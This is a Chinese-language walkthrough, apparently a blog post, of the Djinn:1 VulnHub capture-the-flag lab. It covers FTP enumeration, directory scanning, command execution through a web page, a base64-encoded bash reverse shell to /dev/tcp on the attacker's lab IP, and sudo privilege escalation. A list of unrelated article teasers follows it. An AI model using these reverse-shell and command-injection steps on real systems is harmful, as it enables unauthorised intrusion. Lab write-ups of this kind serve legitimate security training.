Djinn:1

发布时间:2026/9/24 12:01:27

Djinn:1 一、靶机描述及下载地址虚拟机下载地址https://www.vulnhub.com/entry/djinn-1,397/虚拟机简介None目标user.txt和root.txt级别中级二、安装信息下载到的镜像文件直接导入VM即可需要注意的是默认网卡是桥接模式如果想用NAT模式的话直接改一下即可三、详细渗透测试过程1.主机发现因为kali也是NAT模式并且IP地址是192.168.229.1402.直接使用fscan进行探测kali的IP地址是:192.168.229.140目标靶机的IP地址是192.168.229.1503.直接来看ftp的匿名登录4.下载文件5.查看文件内容creds.txtnitu:81299game.trxt文件内容为oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to thefinal level and get the prize.根据提示信息1337端口搭建了一个游戏如果我能到最后一关并且得到prize(奖励奖品)Message.txtnitish81299 I am going on holidays for few days, please take care of all the work.And don’t mess up anything.6.全端口扫描7.先看web服务8.查看页面源代码没发现特别9.目录扫描找后台10.根据AI提示信息11.直接使用nc进行连接12.这里试了好久没出来其实是卡在这里一步的信息收集的不够目录扫描字典太小啦gobuster dir -u http://192.168.229.150:7331 -w /usr/share/wordlists/dirb/big.txthttp://192.168.229.150:7331/genie13.直接可以命令执行http://192.168.229.150:7331/wish14.可以直接命令执行那么直接反弹shell没反弹成功,中途踩了好多的坑只有以下方式可以如果还有其他姿势欢迎大佬斧正echo bash -i /dev/tcp/192.168.207.130/5555 01 | base64echo bash -i /dev/tcp/192.168.229.140/5566 01 | base64echo YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xNDAvNTU2NiAwPiYxCg | base64 -d | bash成功反弹shell15.AI的思路16.AI差一点这道题目最后的提权是通过shell界面切换至nitish用户通过sudo -l17.最让人迷的是最后猜数字输入num竟然提权成功四、总结1.信息收集的能力有待提高目录字典的大小还是能看我是否进一步攻击2.涉及到的提权信息注意切换用户后在提权www-data目录下没得权限3.交换式shell的熟练使用4.注意反弹shell的过程中可以直接使用前台去尝试发包的话需要注意编码空格问题
延伸阅读

更多相关文章

2026/9/23 5:27:45

三大低代码平台Coze、Dify、n8n核心对比与选型指南

1. 三大低代码平台核心定位解析 Coze、Dify和n8n这三个平台在低代码/无代码领域各具特色,但很多刚接触的开发者容易混淆它们的核心能力边界。作为同时深度使用过三款产品的技术负责人,我想从实际业务场景出发,帮大家理清它们的差异化价值。 …

2026/9/24 12:01:04

STM32 VBAT电路设计避坑指南:从RTC失效到工业级可靠供电

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 12:01:04

IPD开发阶段活动清单详解:协作、EC变更与质量成本控制

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/24 12:01:04

汉诺塔宏观表示 —— C语言

引言: 初次学习递归时,汉诺塔作为典型例题难倒了不少初学者。这是因为初学者们总是想细致地、一步一步地观察出其移动步骤,这显然是难以做到的。因此我们可以先从宏观上入手。 汉诺塔http://ybt.ssoier.cn:8088/problem_show.php?pid1205汉…

2026/9/24 12:01:03

Keil MDK 5.37+ 手动安装 ARM Compiler 5 解决 STM32 老工程编译报错

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/9/23 12:07:00

GAMP 5 基于风险的计算机化系统验证:软件分类与审计追踪实践

简介:《A Risk-Based Approach to Compliant GxP Computerized Systems》即业内熟知的GAMP 5指南,面向制药企业质量与IT合规人员、验证工程师及计算机化系统管理者,用于解决GxP法规环境下系统合规性难以科学落地的问题。文档以风险管理为主线…

2026/9/23 12:06:55

安全托管MSSP实战:从静态防御到人机协同的攻防运营与应急响应

简介:这份PPT围绕互联网业务安全托管服务展开,面向企业安全负责人、IT运维人员及关注MSSP/MSS选型的读者,重点回应传统安全过度依赖人工、碎片化静态防御难以对抗产业化攻击等痛点。资源共1个pptx文件,包体约30.63MB,以…

2026/9/24 0:00:21

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

简介:这是一套面向计算机、人工智能、自动化等专业学生与教师的毕业设计级项目资源,围绕YOLOv8实现渔船作业监控系统,可用于毕设、课程设计、大作业或项目立项演示。压缩包共97个文件,约24.21MB,以70个Python源码文件为…

2026/9/24 0:00:21

单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

简介:一份基于单细胞RNA测序数据的细胞类型注释算法研究Python毕业设计源码,针对计算机相关专业正在做毕设或需要项目实战的学习者,可用于课程设计与期末大作业。项目代码完整、经导师指导评审通过,可直接运行,覆盖数据…

2026/9/24 0:00:21

C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

第一次在项目里被反射卡住,是在一个老旧的WinForms模块里:几十个类依赖PropertyChanged通知,运行时反射读属性、发通知,每次启动慢半拍不说,一上.NET Native/AOT裁剪模式几乎全面崩盘。后来我把这段逻辑全部改成C#源生…

2026/9/22 16:34:32

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/22 20:01:30

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/22 13:25:41

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码